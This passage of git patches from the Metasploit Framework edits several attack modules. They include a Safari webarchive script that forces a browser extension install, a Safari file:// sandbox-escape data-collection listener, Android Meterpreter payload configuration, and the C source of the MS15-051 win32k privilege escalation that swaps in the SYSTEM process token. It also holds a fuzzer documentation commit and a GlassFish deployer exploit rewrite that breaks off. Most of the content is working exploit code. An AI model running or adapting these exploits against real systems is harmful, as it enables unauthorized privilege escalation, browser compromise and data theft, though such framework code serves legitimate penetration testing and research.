+        x = window.open('#{apple_extension_url}', 'x');
+
         function go(){
           window.focus();
           window.open('javascript:safari&&(safari.installExtension\|\|(window.top.location.href.match(/extensions/)&&window.top.location.reload(false)))&&(safari.installExtension("'+extID+'", "'+extURL+'"), window.close());', 'x')
         }
         setInterval(go, 400);
-      }, 600);
+      };
 
       |
     end
@@ -326,7 +333,7 @@ function reportStolenCookies() {
 
   # @return [String] the path to send data back to
   def collect_data_uri
-    '/' + datastore["URIPATH"].chomp('/').gsub(/^\//, '') + '/'+datastore["GRABPATH"]
+    '/' + (datastore["URIPATH"] || '').chomp('/').gsub(/^\//, '') + '/'+datastore["GRABPATH"]
   end
 
   # @return [String] formatted http/https URL of the listener
diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb
index 85a95e214f..516eb32987 100644
--- a/modules/auxiliary/gather/safari_file_url_navigation.rb
+++ b/modules/auxiliary/gather/safari_file_url_navigation.rb
@@ -16,11 +16,11 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'        => 'Mac OS X Safari file:// Redirection Sandbox Escape',
       'Description' => %q{
-        Due to an issue in the way Safari handles error page origins,
-        an attacker who can entice a user into visiting a malicious page
-        can gain a reference to the resulting error page in the file:// scheme.
-        From there, the attacker can access cross-domain globals, such as 'location'
-        and 'history,' which leads to a total compromise of the sandbox.
+        Versions of Safari before 8.0.6, 7.1.6, and 6.2.6 are vulnerable to a
+        "state management issue" that allows a browser window to be navigated
+        to a file:// URL. By dropping and loading a malicious .webarchive file,
+        an attacker can read arbitrary files, inject cross-domain Javascript, and
+        silently install Safari extensions.
       },
       'License'     => MSF_LICENSE,
       'Author'      => [
@@ -28,7 +28,8 @@ class Metasploit3 < Msf::Auxiliary
       ],
       'References'  => [
         ['ZDI', '15-288'],
-        ['CVE', '2015-1155']
+        ['CVE', '2015-1155'],
+        ['URL', 'https://support.apple.com/en-us/HT204826']
       ],
       'Platform'    => 'osx',
       'Targets'     =>
@@ -40,12 +41,11 @@ class Metasploit3 < Msf::Auxiliary
     ))
 
 
-    register_options(
-      [
-        OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
-        OptPort.new('SRVPORT',   [true, "The local port to use for the FTP server", 8081]),
-        OptPort.new('HTTPPORT',  [true, "The HTTP server port", 8080])
-      ], self.class )
+    register_options([
+      OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
+      OptPort.new('SRVPORT',   [true, "The local port to use for the FTP server", 8081]),
+      OptPort.new('HTTPPORT',  [true, "The HTTP server port", 8080])
+    ], self.class)
   end
 
   def lookup_lhost(c=nil)
@@ -59,19 +59,16 @@ class Metasploit3 < Msf::Auxiliary
 
   def on_request_uri(cli, req)
     if req.method =~ /post/i
+      data_str = req.body.to_s
       begin
-        data_str = if req.body.size > 0
-          req.body
-        else
-          req.qstring['data']
-        end
         data = JSON::parse(data_str || '')
         file = record_data(data, cli)
-        send_response(cli, 200, 'OK', '')
+        send_response_html(cli, '')
         print_good "data #{data.keys.join(',')} received and stored to #{file}"
       rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
-        print_error "Invalid JSON received."
-        send_not_found(cli)
+        file = record_data(data_str, cli)
+        print_error "Invalid JSON stored in #{file}"
+        send_response_html(cli, '')
       end
     elsif req.uri =~ /#{popup_path}$/
       send_response(cli, 200, 'OK', popup_html)

From c305348a3bc1d6158dffbf86b4144e2acd09624c Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Wed, 24 Jun 2015 02:19:09 -0500
Subject: [PATCH 0536/1013] Fix the mixin to work in the exploit again.

---
 lib/msf/core/format/webarchive.rb | 20 ++++++++++++--------
 1 file changed, 12 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/format/webarchive.rb b/lib/msf/core/format/webarchive.rb
index 0f2ae6aded..0db288073d 100644
--- a/lib/msf/core/format/webarchive.rb
+++ b/lib/msf/core/format/webarchive.rb
@@ -125,15 +125,19 @@ module Webarchive
       var extURL = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_URL'])}');
       var extID = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_ID'])}');
 
-      window.onclick = function(){
-        x = window.open('#{apple_extension_url}', 'x');
-
-        function go(){
-          window.focus();
-          window.open('javascript:safari&&(safari.installExtension\|\|(window.top.location.href.match(/extensions/)&&window.top.location.reload(false)))&&(safari.installExtension("'+extID+'", "'+extURL+'"), window.close());', 'x')
-        }
+      function go(){
+        window.focus();
+        window.open('javascript:safari&&(safari.installExtension\|\|(window.top.location.href.match(/extensions/)&&window.top.location.reload(false)))&&(safari.installExtension("'+extID+'", "'+extURL+'"), window.close());', 'x')
+      }
+      if (!window.x){
+        alert(1);
+        window.onclick = function(){
+          x = window.open('#{apple_extension_url}', 'x');
+          setInterval(go, 400);
+        };
+      } else {
         setInterval(go, 400);
-      };
+      }
 
       |
     end

From 0493ba83a0342fd9818a746ca7c183e619c6c7bd Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 24 Jun 2015 19:56:44 +1000
Subject: [PATCH 0537/1013] Add transport configuration support

---
 .../payloads/stages/android/meterpreter.rb    | 24 +++++++++++++++++--
 1 file changed, 22 insertions(+), 2 deletions(-)

diff --git a/modules/payloads/stages/android/meterpreter.rb b/modules/payloads/stages/android/meterpreter.rb
index fe2e95a156..20f7f52825 100644
--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@@ -7,9 +7,10 @@ require 'msf/core'
 require 'msf/core/payload/dalvik'
 require 'msf/base/sessions/meterpreter_android'
 require 'msf/base/sessions/meterpreter_options'
+require 'rex/payloads/meterpreter/config'
 
+module Metasploit4
 
-module Metasploit3
   include Msf::Sessions::MeterpreterOptions
 
   def initialize(info = {})
@@ -44,6 +45,25 @@ module Metasploit3
 
     # Name of the class to load from the stage, the actual jar to load
     # it from, and then finally the meterpreter stage
-    java_string(clazz) + java_string(metstage) + java_string(met)
+    java_string(clazz) + java_string(metstage) + java_string(met) + java_string(generate_config(opts))
+  end
+
+  def generate_config(opts={})
+    opts[:uuid] ||= generate_payload_uuid
+
+    # create the configuration block, which for staged connections is really simple.
+    config_opts = {
+      ascii_str:  true,
+      arch:       opts[:uuid].arch,
+      expiration: datastore['SessionExpirationTimeout'].to_i,
+      uuid:       opts[:uuid],
+      transports: [transport_config(opts)]
+    }
+
+    # create the configuration instance based off the parameters
+    config = Rex::Payloads::Meterpreter::Config.new(config_opts)
+
+    # return the XML version of it
+    config.to_b
   end
 end

From a8c20496beaf45b280f9daa6c856718ff175fd38 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 24 Jun 2015 22:37:40 +1000
Subject: [PATCH 0538/1013] Remove unused code from the java http stager

---
 lib/msf/core/handler/reverse_http.rb | 12 +-----------
 1 file changed, 1 insertion(+), 11 deletions(-)

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index f2e0073f6a..9102039e86 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -313,21 +313,11 @@ protected
         print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Java payload ...")
         url = payload_uri(req) + conn_id + "/\x00"
 
-        blob = ""
-        blob << obj.generate_stage(
+        blob = obj.generate_stage(
           uuid: uuid,
           uri:  conn_id
         )
 
-        # This is a TLV packet - I guess somewhere there should be an API for building them
-        # in Metasploit :-)
-        packet = ""
-        packet << ["core_switch_url\x00".length + 8, 0x10001].pack('NN') + "core_switch_url\x00"
-        packet << [url.length+8, 0x1000a].pack('NN')+url
-        packet << [12, 0x2000b, datastore['SessionExpirationTimeout'].to_i].pack('NNN')
-        packet << [12, 0x20019, datastore['SessionCommunicationTimeout'].to_i].pack('NNN')
-        blob << [packet.length+8, 0].pack('NN') + packet
-
         resp.body = blob
 
         # Short-circuit the payload's handle_connection processing for create_session

From f07b7af2c9520bc89226ba39e8857fa7812b6f5a Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Wed, 24 Jun 2015 09:18:59 -0400
Subject: [PATCH 0539/1013] Support older targets x86 for MS15-051

---
 .../cve-2015-1701/cve-2015-1701.c             | 136 ++++++++++--------
 .../local/ms15_051_client_copy_image.rb       |  19 ++-
 2 files changed, 87 insertions(+), 68 deletions(-)

diff --git a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
index 9f25a2fe08..c1d7815f83 100755
--- a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
+++ b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
@@ -35,7 +35,14 @@
 #define HMUNIQSHIFT 16
 
 typedef NTSTATUS (NTAPI *pUser32_ClientCopyImage)(PVOID p);
-typedef NTSTATUS (NTAPI *pPLPBPI)(HANDLE ProcessId, PVOID *Process);
+typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
+	IN   HANDLE ProcessId,
+	OUT  PVOID Process
+);
+
+typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
+	_Inout_  PVOID Process
+);
 
 typedef PVOID	PHEAD;
 
@@ -65,19 +72,13 @@ typedef struct _SHAREDINFO {
 
 static const TCHAR	MAINWINDOWCLASSNAME[] = TEXT("usercls348_Mainwindow");
 
-pPLPBPI						g_PsLookupProcessByProcessIdPtr = NULL;
+lPsLookupProcessByProcessId g_pPsLookupProcessByProcessId = NULL;
+lPsReferencePrimaryToken    g_pPsReferencePrimaryToken = NULL;
 pUser32_ClientCopyImage		g_originalCCI = NULL;
 PVOID						g_ppCCI = NULL, g_w32theadinfo = NULL;
 int							g_shellCalled = 0;
 DWORD						g_OurPID;
 
-
-typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
-	_Inout_  PVOID Process
-);
-
-lPsReferencePrimaryToken pPsReferencePrimaryToken = NULL;
-
 typedef NTSTATUS (NTAPI *PRtlGetVersion)( _Inout_	PRTL_OSVERSIONINFOW lpVersionInformation );
 
 NTSTATUS NTAPI RtlGetVersion(
@@ -230,17 +231,7 @@ BOOLEAN supIsProcess32bit(
 	return FALSE;
 }
 
-/*
-* GetPsLookupProcessByProcessId
-*
-* Purpose:
-*
-* Return address of PsLookupProcessByProcessId routine to be used next by shellcode.
-*
-*/
-ULONG_PTR GetPsLookupProcessByProcessId(
-	VOID
-	)
+BOOL GetShellCodeFunctions(VOID)
 {
 	BOOL						cond = FALSE;
 	ULONG						rl = 0;
@@ -248,7 +239,7 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 	ULONG_PTR					KernelBase = 0L, FuncAddress = 0L;
 	PRTL_PROCESS_MODULES		miSpace = NULL;
 	CHAR						KernelFullPathName[MAX_PATH * 2];
-
+	BOOL                        bSuccess = FALSE;
 
 	do {
 
@@ -278,12 +269,12 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 			break;
 		}
 
-		pPsReferencePrimaryToken = (lPsReferencePrimaryToken)GetProcAddress(MappedKernel, "PsReferencePrimaryToken");
-		pPsReferencePrimaryToken = (lPsReferencePrimaryToken)((DWORD_PTR)KernelBase + ((DWORD_PTR)pPsReferencePrimaryToken - (DWORD_PTR)MappedKernel));
-
 		FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsLookupProcessByProcessId");
-		FuncAddress = KernelBase + FuncAddress - (ULONG_PTR)MappedKernel;
+		g_pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)(KernelBase + FuncAddress - (ULONG_PTR)MappedKernel);
 
+		FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsReferencePrimaryToken");
+		g_pPsReferencePrimaryToken = (lPsReferencePrimaryToken)(KernelBase + FuncAddress - (ULONG_PTR)MappedKernel);
+		bSuccess = TRUE;
 	} while (cond);
 
 	if (MappedKernel != NULL) {
@@ -293,7 +284,39 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 		HeapFree(GetProcessHeap(), 0, miSpace);
 	}
 
-	return FuncAddress;
+	return bSuccess;
+}
+
+PSHAREDINFO GetSharedInfo(VOID) {
+	HMODULE	huser32;
+	PSHAREDINFO pSharedInfo = NULL;
+	DWORD dwCursor = 0;
+
+	huser32 = GetModuleHandle(TEXT("user32.dll"));
+	if (huser32 == NULL)
+		return pSharedInfo;
+
+	pSharedInfo = (PSHAREDINFO)GetProcAddress(huser32, TEXT("gSharedInfo"));
+
+#ifndef _M_X64
+	PVOID pUser32InitializeImmEntryTable;
+
+	/* user32!gSharedInfo resoultion for x86 systems < Windows 7 */
+	if (pSharedInfo != NULL)
+		return pSharedInfo;
+
+	pUser32InitializeImmEntryTable = GetProcAddress(huser32, TEXT("User32InitializeImmEntryTable"));
+
+	for (dwCursor = 0; dwCursor < 0x80; dwCursor++) {
+		if ( *((PBYTE)pUser32InitializeImmEntryTable + dwCursor) != 0x50 )
+			continue;
+		if (*((PBYTE)pUser32InitializeImmEntryTable + dwCursor + 1) != 0x68)
+			continue;
+		return *((PSHAREDINFO *)((PBYTE)pUser32InitializeImmEntryTable + dwCursor + 2));
+	}
+#endif
+
+	return pSharedInfo;
 }
 
 /*
@@ -304,28 +327,22 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 * Locate, convert and return hwnd for current thread from SHAREDINFO->aheList.
 *
 */
-HWND GetFirstThreadHWND(
-	VOID
-	)
+HWND GetFirstThreadHWND(VOID)
 {
 	PSHAREDINFO		pse;
-	HMODULE			huser32;
 	PHANDLEENTRY	List;
 	ULONG_PTR		c, k;
 
-	huser32 = GetModuleHandle(TEXT("user32.dll"));
-	if (huser32 == NULL)
-		return 0;
-
-	pse = (PSHAREDINFO)GetProcAddress(huser32, "gSharedInfo");
-	if (pse == NULL)
+	pse = GetSharedInfo();
+	if (pse == NULL) {
 		return 0;
+	}
 
 	List = pse->aheList;
 	k = pse->psi->cHandleEntries;
 
-	if (pse->HeEntrySize != sizeof(HANDLEENTRY))
-		return 0;
+	//if (pse->HeEntrySize != sizeof(HANDLEENTRY))
+		//return 0;
 
 	//
 	// Locate, convert and return hwnd for current thread.
@@ -334,12 +351,11 @@ HWND GetFirstThreadHWND(
 		if ((List[c].pOwner == g_w32theadinfo) && (List[c].bType == TYPE_WINDOW)) {
 			return (HWND)(c | (((ULONG_PTR)List[c].wUniq) << HMUNIQSHIFT));
 		}
-
 	return 0;
 }
 
 // Search the specified data structure for a member with CurrentValue.
-BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
+BOOL FindAndReplaceMember(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
 {
 	DWORD_PTR dwIndex, dwMask;
 
@@ -376,29 +392,25 @@ BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue,
 * Copy system token to current process object.
 *
 */
-NTSTATUS NTAPI StealProcessToken(
-	VOID
-	)
+NTSTATUS NTAPI StealProcessToken(VOID)
 {
-	NTSTATUS Status;
-	PVOID CurrentProcess = NULL;
-	PVOID SystemProcess = NULL;
+	void *pMyProcessInfo = NULL;
+	void *pSystemInfo = NULL;
+	PACCESS_TOKEN systemToken;
+	PACCESS_TOKEN targetToken;
 
-	Status = g_PsLookupProcessByProcessIdPtr((HANDLE)g_OurPID, &CurrentProcess);
-	if (NT_SUCCESS(Status)) {
-		Status = g_PsLookupProcessByProcessIdPtr((HANDLE)4, &SystemProcess);
-		if (NT_SUCCESS(Status)) {
-			PACCESS_TOKEN targetToken = pPsReferencePrimaryToken(CurrentProcess);
-			PACCESS_TOKEN systemToken = pPsReferencePrimaryToken(SystemProcess);
+	g_pPsLookupProcessByProcessId((HANDLE)g_OurPID, &pMyProcessInfo);
+	g_pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
 
-			// Find the token in the target process, and replace with the system token.
-			find_and_replace_member((PDWORD_PTR)CurrentProcess,
-				(DWORD_PTR)targetToken,
-				(DWORD_PTR)systemToken,
-				0x200);
-		}
-	}
-	return Status;
+	targetToken = g_pPsReferencePrimaryToken(pMyProcessInfo);
+	systemToken = g_pPsReferencePrimaryToken(pSystemInfo);
+
+	// Find the token in the target process, and replace with the system token.
+	FindAndReplaceMember((PDWORD_PTR)pMyProcessInfo,
+		(DWORD_PTR)targetToken,
+		(DWORD_PTR)systemToken,
+		0x200);
+	return 0;
 }
 
 
@@ -476,9 +488,9 @@ void win32k_client_copy_image(LPVOID lpPayload)
 	}
 
 	g_OurPID = GetCurrentProcessId();
-	g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId();
+	GetShellCodeFunctions();
 
-	if (g_PsLookupProcessByProcessIdPtr == NULL) {
+	if (g_pPsLookupProcessByProcessId == NULL) {
 		return;
 	}
 
diff --git a/modules/exploits/windows/local/ms15_051_client_copy_image.rb b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
index 12b4a247d8..3ec8721cdb 100644
--- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb
+++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
@@ -26,9 +26,10 @@ class Metasploit3 < Msf::Exploit::Local
       },
       'License'         => MSF_LICENSE,
       'Author'          => [
-          'Unknown',    # vulnerability discovery and exploit in the wild
-          'hfirefox',   # Code released on github
-          'OJ Reeves'   # msf module
+          'Unknown',         # vulnerability discovery and exploit in the wild
+          'hfirefox',        # Code released on github
+          'OJ Reeves',       # msf module
+          'Spencer McIntyre' # msf module
         ],
       'Arch'            => [ ARCH_X86, ARCH_X86_64 ],
       'Platform'        => 'win',
@@ -57,10 +58,15 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def check
+    # Windows XP SP3 (32-bit)                      5.1.2600.6514 (Works)
+    # Windows Server 2003 Standard SP2 (32-bit)    5.2.3790.5445 (Works)
     # Windows Server 2008 Enterprise SP2 (32-bit)  6.0.6002.18005 (Does not work)
-    # Winodws 7 SP1 (64-bit)                       6.1.7601.17514 (Works)
+    # Windows 7 SP1 (64-bit)                       6.1.7601.17514 (Works)
+    # Windows 7 SP1 (64-bit)                       6.1.7601.17535 (Works)
     # Windows 7 SP1 (32-bit)                       6.1.7601.17514 (Works)
+    # Windows 7 SP1 (32-bit)                       6.1.7601.18388 (Works)
     # Windows Server 2008 R2 (64-bit) SP1          6.1.7601.17514 (Works)
+    # Windows Server 2008 R2 (64-bit) SP1          6.1.7601.18105 (Works)
 
     if sysinfo['OS'] !~ /windows/i
       return Exploit::CheckCode::Unknown
@@ -76,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Local
     major, minor, build, revision, branch = file_version(file_path)
     vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
 
-    return Exploit::CheckCode::Safe if build == 7601
+    return Exploit::CheckCode::Safe if build > 7601
 
     return Exploit::CheckCode::Detected
   end
@@ -86,7 +92,8 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Failure::None, 'Session is already elevated')
     end
 
-    if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown
+    check_result = check
+    if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
       fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
     end
 

From e0c52730a041cf60c749c3ba32164e8933aaa28f Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Wed, 24 Jun 2015 13:38:11 -0500
Subject: [PATCH 0540/1013] YARD Documentation for Fuzzer.rb

---
 lib/msf/core/auxiliary/fuzzer.rb | 118 ++++++++++++++++++++++++++++---
 1 file changed, 107 insertions(+), 11 deletions(-)

diff --git a/lib/msf/core/auxiliary/fuzzer.rb b/lib/msf/core/auxiliary/fuzzer.rb
index 5f15235c2a..1185852772 100644
--- a/lib/msf/core/auxiliary/fuzzer.rb
+++ b/lib/msf/core/auxiliary/fuzzer.rb
@@ -8,9 +8,7 @@ module Msf
 ###
 module Auxiliary::Fuzzer
 
-  #
-  # Creates an instance of a fuzzer module
-  #
+
   def initialize(info = {})
     super
     register_advanced_options([
@@ -20,9 +18,12 @@ module Auxiliary::Fuzzer
   end
 
 
+  # Will return or yield numbers based on the presence of a block.
   #
-  # Self-reflective iterators
-  #
+  # @return [Array<Array>] Returns an array of arrays of numbers if there is no block given
+  # @yield [Array<Fixnum>] Yields an array of numbers if there is a block given
+  # @see #fuzzer_number_power2
+
   def fuzz_numbers
     res = []
     self.methods.sort.grep(/^fuzzer_number/).each do |m|
@@ -32,6 +33,12 @@ module Auxiliary::Fuzzer
     res
   end
 
+
+  # Will return or yield a string based on the presense of a block
+  #
+  # @return [Array] Returns and array of arrays of strings if there is no block given
+  # @yield [Array] Yields array of strings if there is a block given
+
   def fuzz_strings
     res = []
     self.methods.sort.grep(/^fuzzer_string/).each do |m|
@@ -41,11 +48,11 @@ module Auxiliary::Fuzzer
     res
   end
 
-  #
-  # General input mangling routines
-  #
+ # Modifies each byte of the string from beginning to end, packing each element as an 8 bit character.
+ #
+ # @returns [Array] Returns an array of an array of strings
+ # @see #fuzzer_string_format
 
-  # Modify each byte of the string moving forward
   def fuzz_string_corrupt_byte(str,max=nil)
     res = []
     0.upto(max ? [max,str.length-1].min : (str.length - 1)) do |offset|
@@ -59,7 +66,12 @@ module Auxiliary::Fuzzer
     res
   end
 
-  # Modify each byte of the string moving backward
+  # Modifies each byte of the string from beginning to end, packing each element as an 8 bit character.
+  #
+  #
+  # @returns [Array] Returns an array of an array of strings
+  # @see fuzzer_string_format
+
   def fuzz_string_corrupt_byte_reverse(str,max=nil)
     res = []
     (max ? [max,str.length-1].min : (str.length - 1)).downto(0) do |offset|
@@ -73,20 +85,29 @@ module Auxiliary::Fuzzer
     res
   end
 
-  #
   # Useful generators (many derived from AxMan)
   #
+  # @returns [Array] Returns and array of strings.
 
   def fuzzer_string_format
     res = %W{ %s %p %n %x %@ %.257d %.65537d %.2147483648d %.257f %.65537f %.2147483648f}
     block_given? ? res.each { |n| yield(n) } : res
   end
 
+  # Reserved filename array
+  # Useful generators (many derived from AxMan)
+  #
+  # @returns [Array] Returns and array of reserved filenames in Windows.
+
   def fuzzer_string_filepath_dos
     res = %W{ aux con nul com1 com2 com3 com4 lpt1 lpt2 lp3 lpt4 prn }
     block_given? ? res.each { |n| yield(n) } : res
   end
 
+  # Fuzzer Numbers by Powers of Two
+  #
+  # @returns [Array] Returns an array with pre-set values
+
   def fuzzer_number_power2
     res = [
       0x100000000,
@@ -105,6 +126,10 @@ module Auxiliary::Fuzzer
     block_given? ? res.each { |n| yield(n) } : res
   end
 
+  # Powers of two by some fuzzing factor.
+  #
+  # @returns [Array] Returns and array of integers.
+
   def fuzzer_number_power2_plus
     res = []
     fuzzer_number_power2 do |num|
@@ -119,6 +144,11 @@ module Auxiliary::Fuzzer
     block_given? ? res.each { |n| yield(n) } : res
   end
 
+  # Generates a fuzz string
+  # If no block set, will retrive characters from the FuzzChar datastore option
+  #
+  # @return [String] Returns a string of size 1024 * 512 specified by the user
+
   def fuzzer_gen_string(len)
     @gen_string_block ||= datastore['FuzzChar'][0,1] * (1024 * 512)
     res = ''
@@ -128,6 +158,9 @@ module Auxiliary::Fuzzer
     res[0,len]
   end
 
+  # Creates a smaller fuzz string starting from length 16 -> 512 bytes long
+  #
+  # @return [Array] Returns an array of characters
   def fuzzer_string_small
     res = []
     16.step(512,16) do |len|
@@ -137,6 +170,9 @@ module Auxiliary::Fuzzer
     res
   end
 
+  # Creates a longer fuzz string from length 64 -> 8192 bytes long
+  #
+  # @return [Array] Returns an array of characters
   def fuzzer_string_long
     res = []
     64.step(8192,64) do |len|
@@ -147,6 +183,9 @@ module Auxiliary::Fuzzer
     res
   end
 
+  # Creates a giant fuzz string from length 512 -> 131,064 bytes long
+  #
+  # @return [Array] Returns an array of characters
   def fuzzer_string_giant
     res = []
     512.step(65532 * 2, 512) do |len|
@@ -157,6 +196,9 @@ module Auxiliary::Fuzzer
     res
   end
 
+  # Various URI types
+  #
+  # @returns [Array] Returns an array of strings
   def fuzzer_string_uri_types
     res = %W{
       aaa  aaas  about  acap  adiumxtra  afp  aim  apt  aw  bolo  callto  cap  chrome  cid
@@ -174,16 +216,28 @@ module Auxiliary::Fuzzer
     block_given? ? res.each { |n| yield(n) } : res
   end
 
+# Generator for common URI dividers
+#
+# @return [Array] Returns an array of strings
+
   def fuzzer_string_uri_dividers
     res = %W{ : :// }
     block_given? ? res.each { |n| yield(n) } : res
   end
 
+# Generator for common path prefixes
+#
+# @return [Array] Returns an array of strings
+
   def fuzzer_string_path_prefixes
     res = %W{ C:\\ \\\\localhost\\ / }
     block_given? ? res.each { |n| yield(n) } : res
   end
 
+# Generates various small URI string types
+#
+# @return [Array] Returns an array of stings
+
   def fuzzer_string_uris_small
     res = []
     fuzzer_string_uri_types do |proto|
@@ -197,6 +251,10 @@ module Auxiliary::Fuzzer
     res
   end
 
+# Generates various long URI string types
+#
+# @return [Array] Returns an array of stings
+
   def fuzzer_string_uris_long
     res = []
     fuzzer_string_uri_types do |proto|
@@ -210,6 +268,10 @@ module Auxiliary::Fuzzer
     res
   end
 
+# Generates various giant URI string types
+#
+# @return [Array] Returns an array of stings
+
   def fuzzer_string_uris_giant
     res = []
     fuzzer_string_uri_types do |proto|
@@ -223,6 +285,10 @@ module Auxiliary::Fuzzer
     res
   end
 
+# Format for the URI string generator
+#
+# @return [Array] Returns an array of stings
+
   def fuzzer_string_uris_format
     res = []
     fuzzer_string_uri_types do |proto|
@@ -236,6 +302,11 @@ module Auxiliary::Fuzzer
     res
   end
 
+
+# Generates various small strings
+#
+# @return [Array] Returns an array of stings
+
   def fuzzer_string_uris_dos
     res = []
     fuzzer_string_uri_types do |proto|
@@ -249,6 +320,11 @@ module Auxiliary::Fuzzer
     res
   end
 
+
+# Generates various small strings
+#
+# @return [Array] Returns an array of stings
+
   def fuzzer_string_paths_small
     res = []
     fuzzer_string_path_prefixes do |pre|
@@ -260,6 +336,11 @@ module Auxiliary::Fuzzer
     res
   end
 
+
+# Generates various small strings
+#
+# @return [Array] Returns an array of stings
+
   def fuzzer_string_paths_long
     res = []
     fuzzer_string_path_prefixes do |pre|
@@ -271,6 +352,11 @@ module Auxiliary::Fuzzer
     res
   end
 
+
+# Generates various giant strings
+#
+# @return [Array] Returns an array of stings
+
   def fuzzer_string_paths_giant
     res = []
     fuzzer_string_path_prefixes do |pre|
@@ -282,6 +368,11 @@ module Auxiliary::Fuzzer
     res
   end
 
+
+# Format for the path generator
+#
+# @return [Array] Returns an array of stings
+
   def fuzzer_string_paths_format
     res = []
     fuzzer_string_path_prefixes do |pre|
@@ -293,6 +384,11 @@ module Auxiliary::Fuzzer
     res
   end
 
+
+# Generates fuzzer strings using path prefixes
+#
+# @return [Array] Returns an array of stings
+
   def fuzzer_string_paths_dos
     res = []
     fuzzer_string_path_prefixes do |pre|

From aa9ea13934ef1859d82c6ffbf93c85f34623fae1 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 24 Jun 2015 11:44:54 -0700
Subject: [PATCH 0541/1013] Fix up the core_machine_id call to handle weirdness
 better

---
 lib/rex/post/meterpreter/client_core.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 9ff18cfba7..48333cdde8 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -321,8 +321,7 @@ class ClientCore < Extension
     # Normalise the format of the incoming machine id so that it's consistent
     # regardless of case and leading/trailing spaces. This means that the
     # individual meterpreters don't have to care
-    mid.downcase!.strip! if mid
-    return Rex::Text.md5(mid)
+    Rex::Text.md5(mid.to_s.downcase.strip)
   end
 
   def transport_remove(opts={})

From 380af29482573ecbcbdc8464103234c0c8712102 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 24 Jun 2015 14:17:45 -0500
Subject: [PATCH 0542/1013] Progress?

---
 .../exploits/multi/http/glassfish_deployer.rb | 427 +++++++-----------
 1 file changed, 157 insertions(+), 270 deletions(-)

diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index 61fa5a56fb..7fd2600524 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -4,6 +4,8 @@
 ##
 
 require 'msf/core'
+require 'metasploit/framework/login_scanner/glassfish'
+require 'metasploit/framework/credential_collection'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -23,11 +25,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          #Msf module for Glassfish 3.0
+          # Msf module for Glassfish 3.0
           'juan vazquez',
-          #Msf module for Glassfish 3.1, 2.x and Sun Java System Application Server 9.1
+          # Msf module for Glassfish 3.1, 2.x and Sun Java System Application Server 9.1
           'Joshua Abraham <jabra[at]rapid7.com>',
-          #Rewrite for 3.0, 3.1 (Commercial or Open Source)
+          # Rewrite for 3.0, 3.1 (Commercial or Open Source)
           'sinn3r',
         ],
       'References'     =>
@@ -39,33 +41,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Targets'        =>
         [
           [ 'Automatic', { } ],
-          [
-            'Java Universal',
-            {
